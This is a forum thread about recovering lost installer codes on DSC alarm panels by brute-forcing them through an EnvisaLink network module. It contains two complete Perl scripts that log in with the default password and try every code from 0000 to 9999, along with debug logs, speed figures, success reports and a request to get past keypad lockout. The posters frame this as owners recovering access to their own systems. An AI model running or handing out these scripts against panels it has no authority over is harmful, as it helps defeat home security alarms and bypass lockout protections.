EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.

Moderators: EyezOnRich, GrandWizard

edirol
Posts: 3
Joined: Fri Jun 12, 2020 6:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by edirol »

I took a look at the debug logs. The script is getting multi-line responses when there should only be one response per line. So for example in mJack's debug, it's expecting "9229D\r\n", but getting "51080FE\r\n8411CE\r\n9229D\r\n". 922 is the response code to tell the script that it should attempt an installer code.

Two options:
#1
The logs indicate trouble codes/LEDs being active. You can try to clear those trouble codes and then try the script again. It's possible having trouble codes causes the DSC system to return multiple codes at a time.

#2
Adjust the script to try to interpret the responses as containing multi-lines.

Look for the following lines:
while ($r =~ /^922/) {
if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
unless ($response =~ /$wanted/) { goto X; }

Replace with:
while ($r =~ /^922/m) {
if ($r =~ /^680/m) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
unless ($response =~ /$wanted/m) { goto X; }

Thanks,
- Edirol
mJack wrote:Hi there,

I am currently trying the perl script but it seem that I am in a loop. I also do not have any logs created in the txt file and I do not see any code attemp (I've try yesterday for hours and its identical as the below sample).

EVL3
DSC PC1616

Device:folder users$ perl -w dsc.pl
Name "main::t" used only once: possible typo at dsc.pl line 54.
[20200918_125615] DEBUG: Connected to EnvisaLink
[20200918_125615] response: '5053CD\r\n' (length 8)
[20200918_125615] sent data '005user54\r\n' (length 11)
[20200918_125615] response: '5000052A\r\n5051CB\r\n' (length 18)
[20200918_125615] DEBUG: Correct EnvisaLink password
[20200918_125615] DEBUG: Start installer mode entry cycle
[20200918_125615] sent data '0711*82B\r\n' (length 10)
[20200918_125615] response: '5000712D\r\n' (length 10)
[20200918_125616] response: '51080FE\r\n8411CE\r\n9229D\r\n' (length 24)
[20200918_125644] response: '5109100\r\n6501CC\r\n8401CD\r\n' (length 25)
[20200918_125649] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_125649] response: '51080FE\r\n' (length 9)
[20200918_125650] response: '51100F7\r\n5109100\r\n6501CC\r\n' (length 26)
[20200918_130059] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130100] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_130452] response: '60900332\r\n6531CF\r\n' (length 18)
[20200918_130457] response: '6100032A\r\n6501CC\r\n' (length 18)
[20200918_130509] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130510] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_130624] response: '60900433\r\n6531CF\r\n' (length 18)
[20200918_130627] response: '6100042B\r\n' (length 10)
[20200918_130628] response: '6501CC\r\n' (length 8)
[20200918_130919] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130920] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_131044] response: '60900130\r\n51090FF\r\n6511CD\r\n' (length 27)
[20200918_131139] response: '61000128\r\n5109100\r\n6501CC\r\n' (length 27)
[20200918_131155] response: '60900332\r\n' (length 10)
[20200918_131156] response: '6531CF\r\n' (length 8)
[20200918_131200] response: '6100032A\r\n' (length 10)
[20200918_131200] response: '6501CC\r\n' (length 8)
[20200918_131221] response: '60900231\r\n51090FF\r\n6511CD\r\n' (length 27)
[20200918_131329] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_131330] response: '51080FE\r\n51100F7\r\n51090FF\r\n6511CD\r\n' (length 35)
[20200918_131545] response: '60900332\r\n' (length 10)
[20200918_131546] response: '61000229\r\n5109100\r\n6531CF\r\n' (length 27)
[20200918_131550] response: '6100032A\r\n' (length 10)
[20200918_131550] response: '6501CC\r\n' (length 8)
[20200918_131739] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_131740] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_132007] response: '60900332\r\n6531CF\r\n' (length 18)
[20200918_132011] response: '6100032A\r\n6501CC\r\n' (length 18)
[20200918_132150] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_132150] response: '51080FE\r\n' (length 9)
[20200918_132150] response: '51100F7\r\n5109100\r\n6501CC\r\n' (length 26)
...

any idea?

Much appreciated.
thanks!
Mike
Wicky wrote:Hi Edirol,

Thanks for your code. I am trying yours now in my DSC 5010, Envisalink 4, Pi Raspbian. Two days now still running no luck. How do I know what is current progress from screen output? Is it working as it should be?

Post some of the screen output here:

[20200619_085258] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085604] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085615] response: '61000229\r\n' (length 10)
[20200619_085615] response: '6501CC\r\n' (length 8)
[20200619_085707] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_085707] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085739] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085740] response: '61000229\r\n' (length 10)
[20200619_085741] response: '6501CC\r\n' (length 8)
[20200619_090044] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090045] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090057] response: '60900231\r\n' (length 10)
[20200619_090058] response: '6531CF\r\n' (length 8)
[20200619_090101] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090116] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090117] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090328] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090339] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090526] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090526] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090935] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090935] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091157] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091158] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091202] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091204] response: '61000229\r\n' (length 10)
[20200619_091205] response: '6501CC\r\n' (length 8)
[20200619_091206] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091216] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091225] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091234] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091240] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091243] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091344] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_091345] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091410] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091413] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091430] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091439] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091454] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091458] response: '61000229\r\n6501CC\r\n' (length 18)

Wicky
bmwhd
Posts: 1
Joined: Sun Jan 03, 2021 1:21 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by bmwhd »

Running the script now on my DSC 1832. Seems to be running ok using Strawberry on my PC. It has hung a couple of times but I restart at the next code and it goes on again for a while. We'll see.

Edit: Script seems to be working but hangs after 20-30 attempts and has to be restarted. I just edit the script to start at the last number before it hangs.

Final update: Successful! Script finally started running without getting stuck. FWIW it was doing 240 attempts an hour on average using an old laptop. Thanks for this!
PDub65
Posts: 1
Joined: Wed Jan 06, 2021 11:38 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by PDub65 »

The script worked for me on a DSC Power Series 832. I was getting about 600 guesses per hour from a Linux VM.

If you are getting the following error, make sure you have no other connections to the EnvisaLink on port 4025. My home automation server was also connecting to port 4025.

connected
response: '' (length 0)
send: Cannot determine peer address at alarm.pl line 115.
retiree_caf
Posts: 1
Joined: Wed Mar 12, 2014 8:55 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by retiree_caf »

I have tried the script using Perl for iOS for a DSC182 and I keep getting the “network is unreachable” error.

Anyone can help explain why it cant connect to the EVL4 ? I have the right IP and password keyed in the source code variable...

Thanks for the help.
Renton
Posts: 1
Joined: Fri Mar 12, 2021 12:36 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Renton »

edirol wrote:Hi Smith,

Thanks for posting this code as it helped me recover my installer code after purchasing a home with an existing DSC system.

I've modified it a bit with:
- major: will retry code entry immediately if presented option
- minor: some more comments
- minor: more debug output
- minor: logs in localtime vs zulu

On my DSC system, it allows 2 attempts every 30s, so this code modification doubled the testing rate.

Thanks,
- Edirol

Here's the updated code:

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink 
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "---------------------------------ADDRESS OF ENVISALINK---------------------------------"; 

# This is your EnvisaLink password.  The default is user if you haven't changed it. 
$password = "user";

# Range which you want to test 
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print 
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);   
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            #  Wait for 922 (EVL requests installer code)
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922 
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode 

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code  

   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }   
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values 
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command 
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response 
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}
Smith wrote:
mikep wrote: Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....


I'm working with an 1835 panel that has the keypad lockout enabled, so after 30 incorrect codes in a row it locks the keyboard for an indeterminable amount of time - maybe 10-15 minutes or so. The script will just hang after the 30 attempts because it never receives the 922 after getting the 658 - keyboard lockout response.

I have 2 ideas for a potential tweak to the script. I do have a working Master Code, and I can arm/disarm the system with the master code which resets the failed code count.

Can someone help rework this script to include some logic to arm/disarm the system via a Master Code every 30th attempt before trying the installer again?

Either that or introducing a 10 minute wait every 30 attempts - but that will make the whole process longer!

Appreciate any suggestions/help.
baobao
Posts: 1
Joined: Thu Jul 22, 2021 5:20 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by baobao »

I did a few changes, the scanning speed is now about 22~24/min.

#http://forum.eyez-on.com/FORUM/viewtopi ... 9&start=30
#https://www.reddit.com/r/homeassistant/ ... ller_code/
#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "192.168.1.XXX";

# This is your EnvisaLink password. The default is user if you haven't changed it.
$password = "user";

# Range which you want to test
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
PeerHost => $ip,
PeerPort => '4025',
Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password)); # 005 - network login

$response = DSC_get();

foreach ($response) {
/^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
/^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
/^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
l0gt("DEBUG: Start installer mode entry cycle");
DSC_put(DSC_cmd("071", "1*8")); # 071 send keys, partition 1, '*8' enter installer mode
# DSC_get_ww("^922"); # Wait for 922 (EVL requests installer code)
$r = DSC_get_ww("^922|^6[58]");
while (index($r, "922") == -1) {
l0gt("There is an exception: '$r'"); # retry
DSC_put(DSC_cmd("071", "1##")); # 071 send keys, partition 1, '##' possibly back out of installer menu
DSC_get_w();
sleep(0.6);
l0gt("fuck up DEBUG: Start installer mode entry cycle");
DSC_put(DSC_cmd("071", "1*8")); # 071 send keys, partition 1, '*8' enter installer mode
# DSC_get_ww("^922"); # Wait for 922 (EVL requests installer code)
$r = DSC_get_ww("^922|^6[58]");
}
l0gt("got 922");
$scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
l0gt("DEBUG: Attempting $scode");
DSC_put(DSC_cmd("200", $scode)); # 200 send a code

# if the code is wrong you will get a 670 response and it will request another installer code via 922
# on my system it will only let you try again once via a 922
# 650=partition ready, 670=invalid access code, 680=system is in installer mode

$r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code

# sleep(1.5);
# try again if given opportunity via 922
while ($r =~ /^922/) {
l0gt("DEBUG 2nd try: Trying again within same cycle");
$code++;
$scode = sprintf("%04d", $code);
l0gt("DEBUG: Attempting $scode");
DSC_put(DSC_cmd("200", $scode));
$r = DSC_get_ww("^670|^6[58]"); #look for retry or ready or installer mode code
#If your system is like mine and only allows one retry,
#accept 670 as a response here, add a 0.6s sleep, and comment out the loop.
#this way it doesn't wait for the system to timeout and forces it to go back to the main menu.
}

l0gt("DEBUG: If we're in installer mode, back out to main menu");
DSC_put(DSC_cmd("071", "1##")); # 071 send keys, partition 1, '##' possibly back out of installer menu
DSC_get_w();
sleep(0.6); # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
my $s = shift;
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
my $s = shift;
print "$s\n";
print OUT "$s\n";
}

sub currenttime {
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
$yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
my @chars = (split//, shift);
my $cs = 0;
foreach (@chars) { $cs += ord($_); }
return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
my $cmd = shift . shift;
return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
my $response = "";
$socket->recv($response, 1024);
my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
l0gt("response: '$hresponse' (length " . length($response) .")");
return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w { # wait for data
my $response = "";
X: sleep(0.1);
$socket->recv($response, 1024);
if ($response eq "") { goto X; }
my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
l0gt("response: '$hresponse' (length " . length($response) .")");
return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww { # wait for specific data
my $response = "";
my $wanted = shift;
X: sleep(0.1);
$socket->recv($response, 1024);
if ($response eq "") { goto X; }
my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
l0gt("response: '$hresponse' (length " . length($response) .")");
unless ($response =~ /$wanted/) { goto X; }
return $response;
}

# Sends a command and logs it
sub DSC_put {
my $req = shift . "\r\n";
my $size = $socket->send($req);
my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
l0gt("sent data '$hreq' (length $size)");
}
mcoad01
Posts: 1
Joined: Thu Nov 25, 2021 8:43 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mcoad01 »

Script worked! DSC PC5020 v3.24 Thanks!!!!
iambdud
Posts: 3
Joined: Mon Dec 27, 2021 12:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by iambdud »

Another +1 for the script working. DSC 1616 Thanks!!!
alt0idman
Posts: 1
Joined: Tue Jan 18, 2022 11:53 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by alt0idman »

Thanks to all for the various iterations of scripts first of all!

I have an EVL3, DSC 1864, not installer locked (no multiple clicks on first power up). I have Loss of System Time after disconnecting AC power + battery power during EVL3 install. I also have error code 4 for failure to communicate (GSM service disconnected). I dont have the installer code of course, and no master code either.. just user codes.

The problem I have is that I've never seen a 922 response from my system ever, after sending the 0711*8 command. Just receive the 500 command ack response and usual zone messages. Waited for 5+ minutes.

Tried the following troubleshooting:
(1) Switch from 071 to 070 individual keystoke approach but no change
(2) Tried different master code commands like *6 to change the time (hoping for master code 921 code)
(3) Reset power (AC + Battery) and tried on a clean started system
(4) Added the description of the codes to the script to decode each code as it comes in (eg Command ACK, Partition Ready...)


[20220121_003633] DEBUG: Connected to EnvisaLink
[20220121_003633] response: '5053CD\r\n' (length 8)
[20220121_003633] sent data '005user54\r\n' (length 11)
[20220121_003633] response: '5000052A\r\n5051CB\r\n' (length 18)
[20220121_003633] DEBUG: Correct EnvisaLink password
[20220121_003633] DEBUG: Start installer mode entry cycle with code 0000
[20220121_003633] sent data '0711*82B\r\n' (length 10)
[20220121_003633] response: '5000712D\r\n' (length 10)
[20220121_003633] Command ACK
[20220121_003644] response: '60901232\r\n6531CF\r\n' (length 18)
[20220121_003644] Zone Open
[20220121_003644] Parition Ready Force Arming Enabled
[20220121_003646] response: '6100122A\r\n' (length 10)
[20220121_003646] Zone Restored
[20220121_003646] response: '6501CC\r\n' (length 8)
[20220121_003646] Parition Ready
[20220121_003647] response: '60901232\r\n6531CF\r\n' (length 18)
[20220121_003647] Zone Open
[20220121_003647] Parition Ready Force Arming Enabled
[20220121_003648] response: '6100122A\r\n6501CC\r\n' (length 18)
[20220121_003648] Zone Restored
[20220121_003648] Parition Ready

Any ideas?
Last edited by alt0idman on Fri Jan 21, 2022 1:50 am, edited 1 time in total.
homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by homediy »

Thanks for the script.. login was successful but the response coming back doesn't looks right.

it's just waiting for response and doesn't progress nor does it terminate. Here's my output. Any ideas what it's stuck at response code "65211FF"?

Code: Select all

[20220120_195156] DEBUG: Connected to EnvisaLink
[20220120_195156] response: '5053CD\r\n' (length 8)
[20220120_195156] sent data '005user54\r\n' (length 11)
[20220120_195156] response: '5000052A\r\n5051CB\r\n' (length 18)
[20220120_195156] DEBUG: Correct EnvisaLink password
[20220120_195156] DEBUG: Start installer mode entry cycle
[20220120_195156] sent data '0711*82B\r\n' (length 10)
[20220120_195156] response: '5000712D\r\n' (length 10)
[20220120_195157] response: '51080FE\r\n' (length 9)
[20220120_195157] response: '5108A0F\r\n' (length 9)
[20220120_195157] response: '6711CF\r\n' (length 8)
[20220120_195200] response: '65211FF\r\n' (length 9)
It hasn't even started ATTEMPT 0000 yet.
Post Reply